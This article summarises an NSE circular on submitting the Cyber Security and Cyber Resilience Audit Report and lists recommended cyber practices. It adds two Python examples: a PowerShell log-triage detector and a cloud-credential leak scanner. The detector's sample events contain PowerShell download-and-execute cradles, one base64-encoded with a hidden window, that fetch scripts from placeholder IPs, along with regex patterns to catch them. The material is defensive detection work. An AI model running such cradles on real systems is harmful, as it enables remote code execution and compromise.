NSE, vide circular dated June 19, 2023, has issued a reminder for submission of the Cyber Security and Cyber Resilience Audit Report for the period ended March 31, 2023. The NSE circular dated May 17, 2023 had mandated all members to submit the Cyber Security and Cyber Resilience Audit Report for the period ended March 31, 2023 to the Exchange on or before June 30, 2023.
As per this circular, the Preliminary Audit Report shall be submitted by June 30, 2023; the Corrective Action Taken Report (ATR), if applicable, by September 30, 2023; and the Follow-on Audit Report, if applicable, by December 31, 2023.
Submission of the Cyber Security & Cyber Resilience Audit Report is mandatory for all active Members of the Exchange. Submission is to be made electronically through the ENIT Member Portal on or before the due date to avoid penal/disciplinary action.
The following are the significant measures suggested as best cyber security practices:
Measures against Phishing Attacks/Websites:
- Proactive monitoring of cyberspace to identify phishing websites related to the organization’s domain and reporting them to the appropriate authorities for action.
- Implementing security awareness campaigns to educate employees about the risks of clicking on links and attachments in emails, and using the advisories issued by CERT-In/CSIRT-Fin as the basis for awareness exercises.
Patch Management and Vulnerability Assessment and Penetration Testing (VAPT):
- Regularly updating operating systems and applications with the latest patches. Considering virtual patching as an interim measure for zero-day vulnerabilities and where patches are not available.
- Conducting security audits and VAPT of applications in accordance with SEBI's circulars, and resolving any observed gaps within the prescribed timelines.
Measures for Data Protection and Data Breach:
- Preparing a detailed incident response plan.
- Enforcing effective data protection, backup, and recovery measures.
- Implementing encryption for data at rest to prevent unauthorized access.
- Identifying and classifying sensitive and Personally Identifiable Information (PII) data and applying encryption measures for data in transit and at rest.
- Deploying data leakage prevention (DLP) solutions/processes.
- Implementing a strong log retention policy in compliance with SEBI regulations, CERT-In requirements, and the IT Act 2000.
- Ensuring that all relevant logs are actually being collected, and monitoring them to identify unusual patterns and behaviour.
Password Policy/Authentication Mechanisms:
- Implementing a strong password policy, including periodic review and removal of ex-employee accounts, prohibiting password reuse, and not storing password lists on systems.
- Enabling multi-factor authentication (MFA) for all users, particularly for online/internet connections, virtual private networks, webmail, and critical systems.
- Implementing a Maker-Checker framework for modifying user rights in internal applications, and enabling MFA for user accounts that access critical applications.
- Implementing a “least privilege” approach to mitigate insider threats and provide security for both on- and off-premises resources.
- Deploying web and email filters on the network to scan and block known bad domains, sources, and addresses.
- Blocking malicious domains/IPs after verification and referring to CSIRT-Fin/CERT-In advisories for the latest information.
- Restricting the execution of PowerShell and Windows Script Host (wscript) in enterprise environments where they are not required; where PowerShell is needed, using the latest version with enhanced logging (such as script block logging) enabled; and using host-based firewalls to limit an attacker's freedom of movement.
- Whitelisting (allowlisting) business-essential ports at the firewall level and blocking all other ports by default.
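The log-monitoring and PowerShell-logging measures above only pay off if someone actually inspects the script block records for the patterns attackers use. The following is an added example, not code from the circular or the Exchange, of the kind of triage a member's SOC could run over PowerShell script block logging events (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The sample events, host names and rule names are constructed for the example; the IP addresses are from documentation ranges.

```python
import base64
import re

# Constructed sample events in the shape of PowerShell script block logging
# records (Event ID 4104). The text is made up for this example.
_ENCODED_PAYLOAD = base64.b64encode(
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x')"
    .encode("utf-16le")  # PowerShell expects -EncodedCommand as base64 of UTF-16LE
).decode()

SAMPLE_EVENTS = [
    {"EventID": 4104, "Host": "WS-01",
     "ScriptBlockText": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"EventID": 4104, "Host": "WS-02",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"EventID": 4104, "Host": "WS-03",
     "ScriptBlockText": "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED_PAYLOAD},
    {"EventID": 4104, "Host": "WS-04",
     "ScriptBlockText": "Start-Process wscript.exe -ArgumentList 'C:\\Users\\Public\\inv.vbs'"},
    {"EventID": 4103, "Host": "WS-05",
     "ScriptBlockText": "Write-Output 'not a script block event'"},
]

# Rule names are this example's own labels, not a standard taxonomy.
SUSPICIOUS = [
    ("download_cradle", re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", re.I)),
    ("script_host", re.compile(r"\b[wc]script(\.exe)?\b", re.I)),
]
# -e, -enc and -EncodedCommand all launch a base64-encoded command line.
ENCODED = re.compile(r"-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none
    or it does not decode as base64 UTF-16LE."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Return the names of the rules that fire on one event.
    Encoded payloads are decoded first so the rules see the real command;
    otherwise an attacker hides every keyword behind base64."""
    if event.get("EventID") != 4104:
        return []
    text = event.get("ScriptBlockText", "")
    hits = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        text = text + "\n" + decoded
    for name, pattern in SUSPICIOUS:
        if pattern.search(text):
            hits.append(name)
    return hits


def triage(events):
    """Map host name to the rule hits of its flagged events."""
    findings = {}
    for ev in events:
        hits = analyse_event(ev)
        if hits:
            findings.setdefault(ev["Host"], []).extend(hits)
    return findings


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(hits))
```

The decode step is the part worth copying: the obvious keywords (`IEX`, `DownloadString`, `-w hidden`) appear in clear text only in the unencoded events; on WS-03 they are visible solely because the base64 blob is decoded before the rules run. A real deployment would feed exported 4104 events into `triage` and forward anything it returns to the incident response process.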
Security of Cloud Services:
- Checking the public accessibility of all cloud instances to prevent inadvertent data leakage.
- Storing cloud access tokens securely and never embedding them in website source code or configuration files.
- Implementing appropriate security measures for testing, staging, and backup environments hosted on the cloud and keeping them segregated from the production environment.
- Considering hybrid data security tools that operate in a shared responsibility model for cloud-based environments.
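The token-exposure measure above is easiest to enforce with a scan of the code and configuration that is about to be published or committed. The following is an added example, not code from the circular or from any cloud provider, of a small scanner that looks for AWS access key IDs by their fixed prefix and for other credential assignments by name plus a Shannon entropy check, so that placeholders such as `${AWS_SECRET_ACCESS_KEY}` or a run of `A`s do not raise alerts. The file contents are constructed for the example; the AWS key pair shown is the placeholder pair AWS uses in its own documentation, not a live credential.

```python
import math
import re
from collections import Counter

# AWS documentation placeholder credentials, used here as constructed input.
AWS_DOC_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_DOC_SECRET = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"

# Constructed repository contents: path -> text.
SAMPLE_FILES = {
    "src/app.js": "const s3 = new S3({ accessKeyId: '%s', secretAccessKey: '%s' });"
                  % (AWS_DOC_KEY_ID, AWS_DOC_SECRET),
    "config/settings.ini": "[storage]\naws_access_key_id = ${AWS_ACCESS_KEY_ID}\n"
                           "aws_secret_access_key = ${AWS_SECRET_ACCESS_KEY}\n",
    "config/example.env": "API_KEY=" + "A" * 32 + "\n",
    "README.md": "Set API_TOKEN=your-token-here before running.\n",
}

# Long-term AWS access key IDs start with AKIA, temporary (STS) ones with ASIA,
# followed by 16 upper-case alphanumerics.
AWS_KEY_ID = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")

# Credential-looking assignment: a sensitive name, then = or :, then a long value.
GENERIC_SECRET = re.compile(
    r"\b(aws_secret_access_key|secretAccessKey|secret|api[_-]?key|token|password)\b"
    r"\s*[:=]\s*['\"]?([A-Za-z0-9/+=_\-]{20,})", re.I)

ENTROPY_THRESHOLD = 3.5  # bits per character; chosen for this example


def shannon_entropy(s):
    """Bits of entropy per character; 0.0 for empty or single-character strings."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def mask(value):
    """Keep a short prefix so the finding can be located without re-exposing it."""
    return value[:4] + "*" * (len(value) - 4)


def scan_text(path, text):
    """Return findings for one file as dicts of path, line, kind and masked value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in AWS_KEY_ID.finditer(line):
            findings.append({"path": path, "line": lineno,
                             "kind": "aws_access_key_id", "value": mask(m.group(0))})
        for m in GENERIC_SECRET.finditer(line):
            candidate = m.group(2)
            # Placeholders and repeated characters have low entropy; real
            # secrets are close to random and score well above the threshold.
            if shannon_entropy(candidate) >= ENTROPY_THRESHOLD:
                findings.append({"path": path, "line": lineno,
                                 "kind": "high_entropy_secret", "value": mask(candidate)})
    return findings


def scan_files(files):
    """Scan every path -> text pair and collect the findings."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print("%s:%d %s %s" % (f["path"], f["line"], f["kind"], f["value"]))
```

Run over the sample tree, only `src/app.js` is reported: the INI file references environment variables rather than values, the `.env` example fails the entropy check, and the README value is too short to be a token. Wiring `scan_files` into a pre-commit hook or CI step is the usual way to make the control automatic.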